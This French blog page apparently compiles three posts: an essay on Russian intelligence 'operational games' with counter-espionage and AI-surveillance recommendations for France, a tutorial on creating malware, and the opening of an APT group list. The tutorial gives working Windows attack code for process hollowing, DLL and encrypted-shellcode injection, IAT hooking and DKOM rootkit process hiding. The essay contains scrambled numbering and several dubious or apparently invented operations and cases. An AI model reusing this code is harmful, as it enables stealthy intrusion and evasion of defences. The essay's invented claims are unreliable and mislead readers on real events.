Agents doubles Russes et jeux opérationnels

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Les services de renseignement du monde entier présentent des similitudes. Tous les services professionnels s’appuient sur des techniques d’espionnage pour recruter et gérer leurs agents. Ils opèrent tous au sein de systèmes bureaucratiques et rendent compte, en fin de compte, aux dirigeants politiques. Fondamentalement, les techniques d’espionnage constituent un langage professionnel commun. Cependant, les services de renseignement russes (RIS) diffèrent sensiblement de leurs homologues occidentaux sur plusieurs points clés. Premièrement, leur mission première n’est ni de servir les intérêts du peuple russe, ni de protéger la Constitution ; leur loyauté va au régime et à la survie politique personnelle de Poutine. Deuxièmement, en matière de techniques d’espionnage, leur approche et leurs tactiques diffèrent de celles de la CIA et des autres services occidentaux. L’un des aspects les plus importants — et souvent mal compris — du renseignement russe est le recours aux agents doubles, connus dans la doctrine du renseignement russe sous le nom de « jeux opérationnels » ( operativnye igry ).

Pour les services de renseignement russes, les jeux opérationnels ne relèvent pas de compétences de niche ni de tactiques de contre-espionnage ponctuelles. Ils sont fondamentaux. Les opérations d’agents doubles sont au cœur de la manière dont les agences russes définissent le succès, justifient leur importance et préservent leur identité institutionnelle. Que les autres méthodes de collecte réussissent ou échouent, le RIS recourt systématiquement et sans relâche aux jeux opérationnels. Par conséquent, comprendre comment et pourquoi le RIS utilise des agents doubles est essentiel pour comprendre le renseignement russe lui-même.

1. Loyauté et mission : le régime avant tout

Différence majeure avec l’Occident

• Occident (CIA, MI6, DGSE, etc.) : Les services de renseignement occidentaux sont théoriquement soumis à un cadre démocratique et constitutionnel. Leur mission officielle inclut la protection des intérêts nationaux, la sécurité des citoyens, et le respect des lois. Leur légitimité dépend de leur capacité à servir l’État de droit, même si des dérives existent (ex. : scandales de la NSA ou de la CIA).
  • Exemple : La CIA rend des comptes au Congrès américain et est encadrée par des lois comme le Foreign Intelligence Surveillance Act (FISA).
• Russie (FSB, SVR, GRU) : Les RIS sont des instruments de pouvoir personnel avant tout. Leur mission principale est de protéger le régime et, par extension, la survie politique de Vladimir Poutine. La Constitution russe ou l’intérêt du peuple sont secondaires.
  • Preuve historique : Le FSB a été utilisé pour réprimer l’opposition (ex. : empoisonnement d’Alexeï Navalny), et le SVR/GRU mènent des opérations hybrides (cyberattaques, désinformation) pour affaiblir les adversaires géopolitiques de la Russie, indépendamment des conséquences pour la population russe.
  • Conséquence : Cette loyauté inconditionnelle au régime explique leur résilience malgré les sanctions ou les échecs (ex. : guerre en Ukraine).

2. Les « jeux opérationnels » (operativnye igry) : une doctrine unique

Définition et principes

Les operativnye igry (Оперативные игры) désignent des opérations de manipulation systématique où les agents russes jouent un rôle actif dans la désinformation, la provocation, et la manipulation des perceptions. Contrairement à l’Occident, où les agents doubles sont souvent utilisés de manière ponctuelle (ex. : contre-espionnage), les RIS en font une stratégie centrale.

Caractéristiques clés :

• Approche proactive : Les RIS ne se contentent pas de recruter des agents ou de collecter des informations. Ils créent des réalités alternatives en infiltrant, corrompant ou retournant des acteurs clés (politiques, militaires, médias).
  • Exemple : L’affaire des Illegals (2010), où des agents russes vivaient sous couverture aux États-Unis pendant des années, ou l’influence sur les élections étrangères (ex. : ingérence dans l’élection américaine de 2016).
• Double jeu institutionnalisé : Les agents doubles ne sont pas une exception, mais une norme. Le SVR et le GRU forment leurs officiers à jouer sur plusieurs tableaux, même au sein de leurs propres rangs, pour tester la loyauté et déjouer les trahisons.
  • Cas emblématique : Oleg Gordievsky (agent double du MI6 au KGB) a révélé que le KGB utilisait des « faux transfuges » pour intoxiquer les services occidentaux.
• Objectif ultime : Déstabiliser l’adversaire en semant la méfiance, en exploitant les divisions internes, et en créant des boucles de désinformation (ex. : théories du complot sur l’Ukraine ou l’OTAN).

3. Techniques et tactiques distinctes
4. Recrutement et gestion des agents

• Chantage et compromission (kompromat) : Les RIS privilégient la collecte de preuves compromettantes (sexuelles, financières, idéologiques) pour contrôler leurs cibles, plutôt que de miser sur l’idéalisme ou l’argent (comme le fait souvent la CIA).
  • Exemple : L’affaire Trump-Russie, où des dossiers compromettants (Steele Dossier) ont été utilisés comme levier.
• Agents « dormants » : Des agents sont placés dans des positions clés (diplomatie, économie, médias) et activés des années plus tard.
  • Exemple : Les réseaux d’influence russes en Europe, comme ceux révélés par le rapport Mitrokhin (archives du KGB).

1. Désinformation et guerre cognitive

• Fabrication de narratifs : Les RIS excellent dans la création de fausses flag operations (opérations sous faux drapeau) pour discréditer leurs ennemis.
  • Exemple : L’empoisonnement des Skripal en 2018, attribué à la Russie mais nié par Moscou, qui a proposé des contre-narratifs absurdes (ex. : théorie du « parfum empoisonné »).
• Exploitation des médias sociaux : Le GRU utilise des fermes à trolls (ex. : Internet Research Agency) pour amplifier les divisions politiques en Occident (ex. : mouvement Black Lives Matter ou QAnon).

1. Résilience et adaptabilité

• Apprentissage des échecs : Contrairement aux services occidentaux, qui peuvent être paralysés par un scandale (ex. : affaire Snowden pour la NSA), les RIS intègrent leurs échecs dans leur doctrine. Un agent démasqué devient une opportunité pour lancer une nouvelle opération de désinformation.
  • Exemple : Après l’expulsion de diplomates russes en 2018, le SVR a redoublé d’efforts pour recruter via des plateformes cryptées (Telegram, Signal).

4. Pourquoi cette approche fonctionne-t-elle ?
5. Culture du secret et de la paranoïa

• En Russie, la méfiance généralisée (héritée du KGB) rend les jeux opérationnels efficaces. Les agents sont formés pour anticiper la trahison et utiliser la psychologie humaine (peur, cupidité, idéologie) comme levier.
• Citation de Poutine : « Il n’y a pas d’anciens officiers du KGB. » → La loyauté est permanente, même après la retraite.

1. Asymétrie avec l’Occident

• Les démocraties ont des freins éthiques et juridiques (ex. : interdiction de la torture, transparence relative). Les RIS n’ont pas ces contraintes et exploitent ces faiblesses.
• Exemple : La Russie utilise des mercenaires (groupe Wagner) pour des opérations plausiblement niables, tandis que l’Occident hésite à externaliser ses sales besognes.

1. Patiente stratégique

• Les RIS jouent sur le long terme. Une opération peut prendre 10 ans avant de porter ses fruits (ex. : infiltration des partis d’extrême droite européens).

5. Implications pour les services occidentaux
6. Nécessité d’une nouvelle doctrine

• Comprendre la mentalité russe : Les analystes occidentaux doivent cesser de projeter leurs valeurs (transparence, règles) sur les RIS. La logique russe est celle de la survie du régime, pas de la « victoire » au sens classique.
• Former des contre-experts : Créer des unités spécialisées dans la détection des jeux opérationnels (ex. : cellule StratCom de l’OTAN).

1. Renforcer la résilience

• Protéger les institutions : Limiter l’accès des agents russes aux postes sensibles (ex. : lois contre l’ingérence étrangère, comme le Foreign Agents Registration Act aux États-Unis).
• Lutter contre la désinformation : Investir dans l’éducation aux médias et la cybersécurité pour contrer les campagnes hybrides.

1. Éviter les pièges

• Ne pas sous-estimer la capacité d’adaptation des RIS. Chaque expulsion de diplomates ou sanction est une opportunité pour eux de changer de tactique.

6. Étude de cas : l’Ukraine (2014–2026)

• Jeux opérationnels en action :
  • 2014 : Utilisation de « petits hommes verts » (soldats sans insigne) en Crimée pour créer un flou juridique.
  • 2022–2026 : Campagnes de désinformation sur les « laboratoires biologiques américains » en Ukraine, ou l’accusation de « nazisme » pour justifier l’invasion.
• Agent double emblématique : Oleg Smolenkov (ex-SVR), qui aurait aidé la CIA à comprendre les operativnye igry avant de disparaître en 2017.

Conclusion : un langage, deux grammaires

Les services de renseignement partagent un langage commun (techniques d’espionnage), mais les RIS en ont développé une grammaire propre, où la fin (la survie du régime) justifie tous les moyens. Pour les contrer, l’Occident doit :

1. Adopter une pensée asymétrique : Ne pas jouer selon leurs règles, mais anticiper leurs coups.
2. Renforcer la coopération interservices : Partager les renseignements sur les tactiques russes (ex. : base de données commune sur les agents dormants).
3. Investir dans la guerre cognitive : Former des experts capables de déconstruire les narratifs russes.

4. Comprendre les vulnérabilités françaises ciblées par les RIS
5. Les RIS exploitent systématiquement les faiblesses structurelles de la France, qu’elles soient politiques, économiques, ou sociétales.
6. Cibles prioritaires des RIS en France

Exemple concret : En 2022, la DGSE a déjoué une tentative d’infiltration d’un réseau d’influence russe au sein du Rassemblement National, via des financements opaques et des promesses de soutien médiatique (source : rapport Sénat 2023).

2. Leçons pour la DGSE : adapter la doctrine
3. Renforcer le contre-espionnage « à la russe »

• Créer une unité dédiée aux operativnye igry :
  • Former des analystes spécialisés dans la détection des agents dormants et des opérations de double jeu.
  • Exemple : Le Royaume-Uni a créé le National Protective Security Authority (NPSA) pour contrer les ingérences hybrides. La France pourrait s’en inspirer.
• Développer des « leurres contrôlés » :
  • La DGSE pourrait simuler des fuites d’informations pour identifier les agents russes en France (technique utilisée par le Mossad).
  • Cas d’école : L’opération Hamilcar (années 1980), où la DGSE a retourné un agent du KGB en lui faisant croire à une taupe française au Kremlin.

1. Moderniser la lutte contre la désinformation

• Collaboration avec l’ANSSI et les plateformes numériques :
  • Obliger les réseaux sociaux à signalement proactif des comptes liés à l’Internet Research Agency (ferme à trolls russe).
  • Outils : Utiliser l’IA pour détecter les schémas de désinformation (ex. : répétition de narratifs pro-russes sur l’Ukraine).
• Cellule de contre-désinformation interministérielle :
  • Associer DGSE, DGSI, et Viginum (service anti-fake news) pour une réponse coordonnée.
  • Exemple : La Lituanie a créé un Centre d’excellence pour la communication stratégique (StratCom) de l’OTAN.

1. Protéger les secteurs stratégiques

• Contrôle renforcé des investissements étrangers :
  • Élargir le périmètre de soumission à autorisation pour les secteurs sensibles (énergie, télécoms, défense), comme le fait le CFIUS aux États-Unis.
  • Exemple : En 2021, la France a bloqué l’acquisition d’une entreprise de cybersécurité par un fonds russe.
• Audit des infrastructures critiques :
  • Vérifier les sous-traitants des centrales nucléaires, ports, et réseaux 5G (risque d’infiltration via des sociétés écrans).

3. Renforcer la résilience sociétale
4. Sensibilisation des élites et des médias

• Formations obligatoires pour les hauts fonctionnaires, militaires, et journalistes sur :
  • Les techniques de recrutement par kompromat.
  • La détection des fausses identités (ex. : diplomates russes sous couverture).
• Campagnes grand public :
  • Expliquer les méthodes russes (ex. : documentaires, modules scolaires), comme le fait la Suède avec son programme Totalförsvar (défense totale).

1. Lutte contre l’ingérence via les diasporas

• Surveillance discrète des réseaux pro-russes :
  • Cibler les associations culturelles, églises orthodoxes, et oligarques installés en France (ex. : Viktor Vekselberg, proche de Poutine, possèdait des actifs en France).
  • Outils juridiques : Utiliser la loi Sapin 2 contre la corruption et le blanchiment.

4. Coopération européenne et atlantique
5. Partager le renseignement en temps réel

• Intégrer pleinement le European Intelligence Analysis Centre (INTCEN) :
  • Échanger des indicateurs de compromise (IOC) avec l’Allemagne, les Pays-Bas, et les pays baltes (cibles majeures des RIS).
• Renforcer le lien avec la CIA et le MI6 :
  • Exemple : L’opération Allied Harbor (2018), où la DGSE a collaboré avec la CIA pour expulser des espions russes en Europe.

1. Sanctions ciblées et diplomatie offensive

• Liste noire européenne des agents russes :
  • Étendre les sanctions à leurs famille et réseaux financiers (comme le fait l’UE depuis 2022).
• Expulsions coordonnées :
  • Répliquer aux expulsions massives de diplomates russes (ex. : 40 expulsions en 2018 après l’affaire Skripal).

5. Innovations technologiques et juridiques
6. Cybersécurité : anticiper les attaques hybrides

• DGSE + ANSSI :
  • Développer des cyber-pièges (honeypots) pour attirer et identifier les hackers du GRU (ex. : unité Bureau 12 de la DGSE).
  • Exemple : En 2020, la France a attribué la cyberattaque contre l’hôpital de Villefranche au groupe APT29 (lié au SVR).

1. Cadre juridique adapté

• Loi sur l’ingérence étrangère :
  • Inspiré du Foreign Agents Registration Act (FARA) américain, obligera les lobbyistes pro-russes à se déclarer.
  • Projet en cours : La proposition de loi LOPMI (2024) va dans ce sens.
• Protection des lanceurs d’alerte :
  • Créer un statut européen pour les transfuges russes (ex. : Maksim Shugaley, agent du GRU arrêté en Libye en 2019).

6. Étude de cas : l’affaire Benalla et les leçons non tirées

• Contexte : En 2018, Alexandre Benalla, collaborateur d’Emmanuel Macron, a été lié à des négociations avec des oligarques russes (via des intermédiaires).
• Erreurs françaises :
  • Manque de vigilance sur les conflits d’intérêts.
  • Absence de vérification approfondie des contacts étrangers de l’Élysée.
• Leçon :
  • Audit systématique des entourages présidentiels et ministériels par la DGSI.

7. Recommandations concrètes pour la France

8. Pièges à éviter

• Sous-estimer la patience russe : Les RIS préparent leurs opérations sur 10–15 ans (ex. : infiltration de l’extrême droite française depuis les années 2000).
• Négliger les alliances improbables : La Russie collabore avec la Chine et l’Iran pour des opérations conjointes (ex. : cyberattaques, désinformation).
• Réagir de manière prévisible : Les expulsions de diplomates doivent être coordonnées avec l’UE pour éviter les représailles ciblées.

Conclusion : une approche globale et proactive

La France doit combiner :

1. Renseignement offensif (infiltration des réseaux russes).
2. Protection des infrastructures (énergie, défense, numérique).
3. Résilience sociétale (éducation, transparence).
4. Coopération internationale (UE, OTAN).

L’utilisation de l’intelligence artificielle (IA) par la DGSE pour détecter les agents dormants russes (ou d’autres services étrangers) représente une opportunité majeure, mais aussi un défi technique et éthique. Voici une analyse structurée des méthodes, outils et limites d’une telle approche, adaptée au contexte français et aux spécificités des operativnye igry russes.

1. Définition : Qu’est-ce qu’un agent dormant ?

Un agent dormant est un individu recruté et formé par un service de renseignement étranger, mais inactif pendant des années, voire des décennies, jusqu’à son activation. Il peut être :

• Un citoyen français (recruté via chantage, idéologie ou argent).
• Un diplomate, homme d’affaires ou étudiant sous couverture.
• Un membre d’une diaspora ou d’un réseau d’influence.

Exemple russe : Les Illegals du SVR (comme Anna Chapman, démasquée en 2010) vivaient aux États-Unis sous de fausses identités pendant des années.

2. Comment l’IA peut aider la DGSE ?
3. Analyse des données massives (Big Data)

L’IA excelle dans le traitement de volumes colossaux de données pour identifier des anomalies ou des schémas suspects.

Sources de données exploitables :

Cas pratique : En 2020, le MI5 britannique a utilisé l’IA pour croiser des données de téléphonie et de voyages, ce qui a permis de démasquer un réseau d’agents dormants du GRU.

1. Techniques d’IA applicables
2. Apprentissage supervisé (Supervised Learning)

• Principe : L’IA est entraînée sur des jeux de données labellisés (ex. : profils connus d’agents russes vs. citoyens ordinaires).
• Applications :
  • Classification des comportements : L’IA identifie des signaux faibles (ex. : un cadre français qui communique régulièrement avec une ambassade russe, sans raison professionnelle).
  • Détection de langages codés : Analyse sémantique des échanges pour repérer des mots-clés ou des phrases types utilisés par les services russes.

2. Apprentissage non supervisé (Unsupervised Learning)

• Principe : L’IA recherche des anomalies dans des datasets non étiquetés.
• Applications :
  • Clustering : Regroupement d’individus aux profiles similaires (ex. : plusieurs personnes sans lien apparent, mais qui voyagent aux mêmes dates en Russie).
  • Détection de réseaux cachés : Cartographie des connexions indirectes (ex. : un universitaire français en contact avec un oligarque russe via une ONG).

3. Traitement automatique du langage (NLP)

• Principe : Analyse des textes (e-mails, posts sur les réseaux) pour détecter des incohérences ou des narratifs pro-russes.
• Applications :
  • Détection de propagande ou de désinformation (ex. : reprise systématique de thèmes du Kremlin).
  • Identification de fausses identités (ex. : un profil LinkedIn créé il y a 2 ans, mais avec une histoire professionnelle invérifiable).

4. Analyse des réseaux (Graph Analytics)

• Principe : Modélisation des relations entre individus (réseaux sociaux, transactions).
• Applications :
  • Visualisation des liens faibles (ex. : un fonctionnaire français et un diplomate russe ont le même contact à Moscou).
  • Détection de communautés suspectes (ex. : un groupe de lobbyistes pro-russes en contact avec des militaires).

5. Reconnaissance biométrique

• Principe : Comparaison de visages ou de voix avec des bases de données russes.
• Applications :
  • Vérification si un « étudiant russe » en France correspond à un agent connu du SVR (via des bases comme Frontex ou Interpol).

1. Outils concrets pour la DGSE

Exemple français : La DGSE utilise déjà des outils similaires pour la lutte antiterroriste. Une adaptation pour le contre-espionnage est envisageable, avec des algorithmes spécifiques aux méthodes russes.

3. Étapes pour mettre en place un système IA anti-agents dormants

Étape 1 : Collecte et centralisation des données

• Sources :
  • ANSSI (cyber).
  • Douanes (voyages).
  • Banques (transactions).
  • Réseaux sociaux (via des partenariats légaux).
• Cadre juridique :
  • Utiliser la loi renseignement (2015) et le RGPD (avec dérogations pour la sécurité nationale).

Étape 2 : Entraînement de l’IA

• Jeux de données :
  • Profils d’agents russes déjà démasqués (ex. : affaires passées).
  • Données synthétiques pour simuler des scénarios.
• Collaboration :
  • Partenariat avec le CEA ou Inria pour développer des algorithmes sur mesure.

Étape 3 : Détection et alerte

• Seuils d’alerte :
  • Un individu avec 3 signaux faibles (ex. : voyage en Russie + contact avec un diplomate + intérêt pour la défense) déclenche une enquête humaine.
• Validation par des analystes :
  • L’IA ne remplace pas le jugement humain, mais priorise les cibles.

Étape 4 : Action

• Surveillance discrète (filature, écoutes légales).
• Recrutement en tant qu’agent double (si possible).
• Neutralisation (expulsion, arrestation).

4. Limites et risques
5. Faux positifs et biais

• Risque : L’IA peut stigmatiser des innocents (ex. : un universitaire étudiant la Russie).
• Solution :
  • Audit régulier des algorithmes par des experts indépendants.
  • Transparence partielle (ex. : expliquer à un suspect pourquoi il est surveillé).

1. Contournement par les RIS

• Les agents russes adaptent leurs méthodes :
  • Utilisation de messageries chiffrées (Signal, Telegram).
  • Fausses pistes (ex. : créer des profils « leurres » pour saturer l’IA).
• Solution :
  • Mettre à jour en continu les modèles d’IA avec les dernières tactiques russes.

1. Enjeux éthiques et juridiques

• Vie privée : La surveillance de masse est illégale en France sans motif valable.
• Solution :
  • Cibler uniquement les personnes à risque (ex. : hauts fonctionnaires, militaires).
  • Contrôle parlementaire (via la Délégation parlementaire au renseignement).

5. Exemple concret : un scénario d’utilisation

Cas : Un ingénieur de Naval Group (spécialisé dans les sous-marins) est repéré par l’IA parce que :

1. Il a voyagé 5 fois à Saint-Pétersbourg en 2 ans (sans raison professionnelle).
2. Son compte LinkedIn a été « liké » par un attaché militaire russe.
3. Il a recherché des articles sur les systèmes de propulsion nucléaire.
4. Il a reçu un virement de 5 000 € d’une société offshore.

Processus :

1. L’IA signale le profil à la DGSE.
2. Une équipe vérifie manuellement les données.
3. Si confirmation, surveillance rapprochée ou interpellation.

6. Comparaison internationale

7. Recommandations pour la DGSE

1. Investir dans des partenariats tech :
   • Collaborer avec Thales, Atos, ou des startups françaises (ex. : Dataiku).
2. Former des data scientists :
   • Créer une unité dédiée au sein de la DGSE, mixant experts en IA et anciens agents.
3. Coopérer avec l’UE :
   • Partager des bases de données avec l’Allemagne et les Pays-Bas (cibles majeures des RIS).
4. Anticiper l’évolution des menaces :
   • Intégrer l’analyse des deepfakes et des bots sur les réseaux sociaux.

8. Conclusion : l’IA comme multiplicateur de force

L’IA ne remplacera pas le travail humain de la DGSE, mais elle peut : ✅ Automatiser la détection des signaux faibles. ✅ Réduire le temps d’enquête de plusieurs mois à quelques jours. ✅ Identifier des réseaux invisibles aux méthodes traditionnelles.

Prochaine étape : La France pourrait lancer un projet pilote sur un secteur critique (ex. : énergie ou défense), en s’inspirant du modèle israélien (Unit 8200).

L’Art de la Création de Malware ( fourni à des fins éducatives et de recherche en sécurité offensive)

par Aics-sr | Fév 10, 2026 | Moments d'histoire

L’Art de la Création de Malware ( fourni à des fins éducatives et de recherche en sécurité offensive)

Techniques Avancées d’Évasion et d’Injection

Décortiquer les mécanismes utilisés par les acteurs malveillants pour détourner l’exécution du code, échapper aux détections et s’implanter profondément dans les systèmes Windows.

Nous aborderons des concepts allant de la manipulation bas-niveau des structures système (comme le PEB) aux techniques d’injection de shellcode chiffré, en passant par l’émulation de tactiques attribuées à des groupes APT (Advanced Persistent Threat) tels qu’APT28, APT29 et APT33.

 Note importante : Ce contenu est fourni à des fins éducatives et de recherche en sécurité offensive. La compréhension de ces techniques est essentielle pour développer des défenses robustes.

1. Les Fondamentaux : Windows API et Liaison Dynamique

L’API Windows (WinAPI) est l’interface fondamentale permettant aux programmes d’interagir avec le système d’exploitation. Pour un développeur de malware, la manière dont les fonctions sont chargées peut faire la différence entre la détection et la furtivité.

Liaison Statique vs Dynamique

• Liaison statique : Le code de la fonction est intégré directement dans l’exécutable.

int main(void) {

    MessageBoxA(0, “Foo Here.”, “Info”, 0);

    return 0;

}

• Problème : Facilement détectable par les outils de sécurité.
• Liaison dynamique : La fonction est chargée à l’exécution depuis une DLL.

int main(void) {

    size_t get_MessageBoxA = (size_t)GetProcAddress(LoadLibraryA(”USER32.dll”), “MessageBoxA”);

    def_MessageBoxA msgbox_a = (def_MessageBoxA)get_MessageBoxA;

    msgbox_a(0, “Foo Here.”, “Info”, 0);

    return 0;

}

Avantage : Réduit la signature statique et permet une résolution d’API à la volée.

2. Accès au PEB (Process Environment Block)

Le PEB est une structure de données critique contenant des informations sur le processus en cours d’exécution. Il est accessible en mode utilisateur et permet de récupérer les adresses de base des modules chargés (DLL).

Localisation du PEB

• x86 : fs:[0x30]
• x64 : gs:[0x60]

Exemple : Récupération de l’adresse de base d’une DLL

size_t GetModHandle(wchar_t *libName) {

    PEB32 *pPEB = (PEB32 *)__readfsdword(0x30);

    PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

    for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {

        LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks);

        if (StrStrIW(libName, data->BaseDllName.Buffer))

            return data->DllBase;

    }

    return 0;

}

Cette fonction parcourt la liste des modules chargés pour trouver kernel32.dll et récupérer son adresse de base.

3. Résolution Dynamique d’API via les Tables d’Export

Une fois le module de base obtenu, on peut parser sa table d’export pour localiser l’adresse d’une fonction spécifique.

size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {

    // Parsing des en-têtes PE

    PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);

    PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);

    IMAGE_DATA_DIRECTORY dataDir_exportDir = ntHdr->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    // Accès à la table d’export

    PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);

    DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);

    DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);

    WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

    // Recherche de la fonction par nom

    for (size_t i = 0; i < exportTable->NumberOfNames; i++) {

        char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);

        if (!stricmp(sz_CurrApiName, szFuncName)) {

            WORD num_CurrApiOrdinal = arrNameOrds[i] + 1;

            return moduleBase + arrFuncs[num_CurrApiOrdinal – 1];

        }

    }

    return 0;

}

Cette technique permet d’appeler des API comme WinExec de manière totalement dynamique, sans import statique.

int main() {

    size_t kernelBase = GetModHandle(L”kernel32.dll”);

    size_t ptr_WinExec = GetFuncAddr(kernelBase, “WinExec”);

    ((UINT(WINAPI*)(LPCSTR, UINT))ptr_WinExec)(”calc”, SW_SHOW);

    return 0;

}

4. IAT Hooking – Détournement de la Table d’Import

L’IAT (Import Address Table) contient les adresses des fonctions importées par un module. En hookant l’IAT, on peut intercepter et modifier les appels d’API.

void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr) {

    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];

    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];

    for (; impModuleList->Name; impModuleList++) {

        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];

        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];

        for (int i = 0; arr_apiNames[i].u1.Function; i++) {

            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];

            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name)) {

                apiAddr = arr_callVia[i].u1.Function;

                arr_callVia[i].u1.Function = callback; // Remplacement de l’adresse

                break;

            }

        }

    }

}

Utilisation : Hook de MessageBoxA pour modifier son comportement.

5. Process Hollowing – Remplacement de Processus Légitimes

Cette technique consiste à créer un processus légitime en état suspendu, puis à remplacer son code et ses données par une charge malveillante.

Étapes clés :

1. Création du processus suspendu avec CreateProcessA et le flag CREATE_SUSPENDED.
2. Allocation de mémoire dans le processus cible via VirtualAllocEx.
3. Écriture des en-têtes PE et des sections dans la mémoire allouée avec WriteProcessMemory.
4. Mise à jour du contexte du thread (registre EAX) pour pointer vers le point d’entrée du nouveau code.
5. Reprise de l’exécution avec ResumeThread.

// Création du processus suspendu

CreateProcessA(path, 0, 0, 0, false, CREATE_SUSPENDED, 0, 0, &SI, &PI);

// Injection du code malveillant

WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);

for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)

    WriteProcessMemory(PI.hProcess, LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),

                       LPVOID((size_t)Image + SectionHeader[i].PointerToRawData),

                       SectionHeader[i].SizeOfRawData, 0);

// Modification du contexte et reprise

CTX->Eax = DWORD(pImageBase) + NtHeader->OptionalHeader.AddressOfEntryPoint;

SetThreadContext(PI.hThread, LPCONTEXT(CTX));

ResumeThread(PI.hThread);

Cas réel : Cette méthode est similaire à celle utilisée par X-Agent (APT28/Fancy Bear).

6. Techniques d’Injection de DLL

L’injection de DLL permet d’introduire du code dans un processus cible. Plusieurs méthodes existent :

1. Via LoadLibraryA

• Alloue de la mémoire pour le chemin de la DLL.
• Utilise CreateRemoteThread pour appeler LoadLibraryA avec ce chemin.

WriteProcessMemory(hHandle, dllPathAddr, dllPath, strlen(dllPath), NULL);

CreateRemoteThread(hHandle, NULL, 0, (LPTHREAD_START_ROUTINE)loadLibAddr, dllPathAddr, 0, NULL);

1. Via NtCreateThreadEx (API non documentée)

• Plus furtif, évite les détections basées sur CreateRemoteThread.
• Nécessite la résolution dynamique de NtCreateThreadEx depuis ntdll.dll.

7. Injection de Shellcode et Évasion

Le shellcode est du code machine autonome, souvent utilisé pour des exécutions directes en mémoire.

Exemple : Injection de shellcode chiffré AES (Technique Early Bird – APT33)

int AESDecrypt(unsigned char* payload, DWORD payload_len, char* key, size_t keylen) {

    HCRYPTPROV hProv; HCRYPTHASH hHash; HCRYPTKEY hKey;

    CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES, CRYPT_VERIFYCONTEXT);

    CryptCreateHash(hProv, CALG_SHA_256, 0, 0, &hHash);

    CryptHashData(hHash, (BYTE*)key, (DWORD)keylen, 0);

    CryptDeriveKey(hProv, CALG_AES_256, hHash, 0, &hKey);

    CryptDecrypt(hKey, (HCRYPTHASH)NULL, 0, 0, payload, &payload_len);

    // Nettoyage

    CryptDestroyKey(hKey); CryptDestroyHash(hHash); CryptReleaseContext(hProv, 0);

    return 0;

}

Processus :

1. Création d’un processus suspendu (svchost.exe).
2. Déchiffrement du shellcode en mémoire.
3. Allocation et écriture du shellcode dans le processus cible.
4. Exécution via QueueUserAPC pour une injection furtive.

8. Développement d’un Rootkit en Mode Kernel

Un rootkit opère au niveau le plus bas du système pour masquer sa présence.

1. Driver Entry Point

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {

    DbgPrint(”Hello World!”);

    return STATUS_SUCCESS;

}

1. Dissimulation de Processus via DKOM (Direct Kernel Object Manipulation)

NTSTATUS HideProcess(ULONG pid) {

    PEPROCESS currentEProcess = PsGetCurrentProcess();

    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;

    // Parcours de la liste des processus

    // Suppression du processus cible de la liste chaînée

    blink->Flink = flink;

    flink->Blink = blink;

    return STATUS_SUCCESS;

}

Cette technique manipule la structure EPROCESS pour rendre un processus invisible aux outils système.

1. Injection de DLL en Mode Kernel

• Utilisation de PsSetLoadImageNotifyRoutine pour surveiller le chargement de kernel32.dll.
• Injection via APC (Asynchronous Procedure Call) pour exécuter du code dans un thread cible.

Conclusion : L’Évolution Continue des Techniques Malveillantes

Nous avons parcouru un large éventail de techniques, de la manipulation basique d’API à la création de rootkits kernel. Chaque méthode présente des avantages et des limitations, et leur efficacité dépend du contexte d’utilisation et des mesures de défense en place.

Rappel : Ces connaissances doivent servir à renforcer la cybersécurité, non à nuire. La compréhension offensive est un pilier essentiel de la défense proactive.

LE MONDE COMPLEXE DES APT

par Aics-sr | Fév 10, 2026 | Moments d'histoire

Les APT (Advanced Persistent Threat) sont des groupes de cybermenace parrainés par des États ou des acteurs organisés, spécialisés dans le cyberespionnage, le sabotage ou le vol de données sensibles. Ils ciblent souvent des gouvernements, des entreprises stratégiques, des infrastructures critiques ou des organisations internationales.

Voici une liste des principaux groupes APT actifs, classés par pays ou affiliation présumée, avec leurs spécialités et cibles typiques. Ces informations sont basées sur des rapports publics (ANSSI, NSA, Mandiant, Kaspersky, etc.) et des analyses de cybersécurité.

1. Groupes liés à la Russie

APT29 (Cozy Bear, The Dukes, Nobelium)

• Affiliation : Service de renseignement étranger russe (SVR).
• Cibles : Gouvernements (États-Unis, Europe), think tanks, partis politiques, laboratoires pharmaceutiques (ex : piratage des vaccins COVID-19).
• Méthodes : Phishing sophistiqué, malwares comme WellMess ou CosmicDuke.
• Exemple : Attaque contre SolarWinds (2020).

APT28 (Fancy Bear, Sofacy, Sednit)

• Affiliation : GRU (renseignement militaire russe).
• Cibles : Ministères de la Défense, organisations sportives (ex : dopage aux JO), médias.
• Méthodes : Campagnes de désinformation, malwares (X-Agent, Zebrocy).
• Exemple : Piratage du Comité national démocrate (DNC) en 2016.

Sandworm (Voodoo Bear, Iron Viking)

• Affiliation : GRU (Unité 74455).
